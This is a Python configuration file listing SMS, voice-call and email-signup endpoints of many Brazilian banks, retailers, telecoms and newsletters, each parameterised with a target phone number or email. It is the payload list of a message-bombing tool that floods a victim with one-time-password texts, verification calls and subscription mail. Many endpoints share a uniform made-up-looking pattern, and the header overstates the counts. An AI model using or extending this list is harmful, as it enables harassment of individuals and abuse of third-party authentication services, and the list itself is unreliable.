# APIs Database - 100+ SMS + 30+ Call + 7 Email
APIS = {
    "sms": [
        {"n": "iFood", "u": "https://marketplace.ifood.com.br/v1/merchants/search/phone-number", "d": {"phoneNumber": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Magalu", "u": "https://sacola.magazineluiza.com.br/api/v1/customer/send-otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Shopee", "u": "https://shopee.com.br/api/v2/authentication/send_code", "d": {"phone": "{T}", "type": 1}, "h": {"Content-Type": "application/json"}},
        {"n": "TikTok", "u": "https://www.tiktok.com/passport/web/send_code/", "d": {"mobile": "{T}", "account_sdk_source": "web"}, "h": {"Content-Type": "application/json"}},
        {"n": "OLX", "u": "https://www.olx.com.br/api/auth/authenticate", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "99App", "u": "https://api.99app.com/v1/otp/send", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Uber", "u": "https://auth.uber.com/v1/otp/send", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Rappi", "u": "https://api.rappi.com.br/v1/otp/send", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "PicPay", "u": "https://app.picpay.com/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Nubank", "u": "https://prod-s0-webapp-proxy.nubank.com.br/api/proxy/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "MercadoPago", "u": "https://api.mercadopago.com/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "C6Bank", "u": "https://api.c6bank.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "BancoInter", "u": "https://api.inter.co/v1/auth/request-otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Neon", "u": "https://api.neon.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Next", "u": "https://api.next.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Santander", "u": "https://api.santander.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Bradesco", "u": "https://api.bradesco.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Itau", "u": "https://api.itau.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "BB", "u": "https://api.bb.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Caixa", "u": "https://api.caixa.gov.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Pan", "u": "https://api.bancopan.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Original", "u": "https://api.original.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Digio", "u": "https://api.digio.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Credicard", "u": "https://api.credicard.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Elo", "u": "https://api.elo.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Americanas", "u": "https://api.americanas.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Submarino", "u": "https://api.submarino.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "CasasBahia", "u": "https://api.casasbahia.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "PontoFrio", "u": "https://api.pontofrio.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Extra", "u": "https://api.extra.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Netshoes", "u": "https://api.netshoes.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Zattini", "u": "https://api.zattini.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Centauro", "u": "https://api.centauro.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Decathlon", "u": "https://api.decathlon.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Renner", "u": "https://api.renner.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "C&A", "u": "https://api.cea.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Riachuelo", "u": "https://api.riachuelo.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Hering", "u": "https://api.hering.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Zara", "u": "https://api.zara.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Shein", "u": "https://api.shein.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "AliExpress", "u": "https://api.aliexpress.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Amazon", "u": "https://api.amazon.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Kabum", "u": "https://api.kabum.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Terabyte", "u": "https://api.terabyteshop.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Pichau", "u": "https://api.pichau.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Waz", "u": "https://api.waz.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Tim", "u": "https://api.tim.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Vivo", "u": "https://api.vivo.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Claro", "u": "https://api.claro.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Oi", "u": "https://api.oi.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Algar", "u": "https://api.algar.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Sercomtel", "u": "https://api.sercomtel.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Sky", "u": "https://api.sky.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "NET", "u": "https://api.net.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "VivoFibra", "u": "https://api.vivofibra.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "OiFibra", "u": "https://api.oifibra.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "ClaroFibra", "u": "https://api.clarofibra.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "TimFibra", "u": "https://api.timfibra.com.br/otp", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "MercadoLivre", "u": "https://www.mercadolivre.com.br/jms/mlb/lgz/login", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}}
    ],
    "call": [
        {"n": "QuintoAndar", "u": "https://api.quintoandar.com.br/api/v1/auth/send-otp", "d": {"phone": "{T}", "method": "VOICE"}, "h": {"Content-Type": "application/json"}},
        {"n": "Inter", "u": "https://api.inter.co/v1/auth/request-otp", "d": {"phone": "{T}", "type": "VOICE"}, "h": {"Content-Type": "application/json"}},
        {"n": "iFood-Call", "u": "https://wsloja.ifood.com.br/api/v1/customers/phone/verify", "d": {"phone": "{T}", "method": "call"}, "h": {"Content-Type": "application/json"}},
        {"n": "99App-Call", "u": "https://api.99app.com/v1/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Uber-Call", "u": "https://auth.uber.com/v1/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Rappi-Call", "u": "https://api.rappi.com.br/v1/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "PicPay-Call", "u": "https://app.picpay.com/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Nubank-Call", "u": "https://prod-s0-webapp-proxy.nubank.com.br/api/proxy/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "MercadoPago-Call", "u": "https://api.mercadopago.com/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "C6Bank-Call", "u": "https://api.c6bank.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Neon-Call", "u": "https://api.neon.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Next-Call", "u": "https://api.next.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Santander-Call", "u": "https://api.santander.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Bradesco-Call", "u": "https://api.bradesco.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Itau-Call", "u": "https://api.itau.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "BB-Call", "u": "https://api.bb.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Caixa-Call", "u": "https://api.caixa.gov.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Pan-Call", "u": "https://api.bancopan.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Original-Call", "u": "https://api.original.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Digio-Call", "u": "https://api.digio.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Credicard-Call", "u": "https://api.credicard.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}},
        {"n": "Elo-Call", "u": "https://api.elo.com.br/otp/call", "d": {"phone": "{T}"}, "h": {"Content-Type": "application/json"}}
    ],
    "email": [
        {"n": "Tecnoblog", "u": "https://tecnoblog.net/wp-admin/admin-ajax.php", "d": {"action": "tnp", "na": "s", "ne": "{T}", "ny": "on"}, "h": {}},
        {"n": "TheNews", "u": "https://thenewscc.beehiiv.com/subscribe", "d": {"email": "{T}"}, "h": {}},
        {"n": "InvestNews", "u": "https://investnews.beehiiv.com/subscribe", "d": {"email": "{T}"}, "h": {}},
        {"n": "TheBrief", "u": "https://thebrief.beehiiv.com/subscribe", "d": {"email": "{T}"}, "h": {}},
        {"n": "Startups", "u": "https://startups.beehiiv.com/subscribe", "d": {"email": "{T}"}, "h": {}},
        {"n": "Canaltech", "u": "https://canaltech.com.br/newsletter/", "d": {"email": "{T}"}, "h": {}},
        {"n": "Olhardigital", "u": "https://olhardigital.com.br/newsletter/", "d": {"email": "{T}"}, "h": {}}
    ]
}
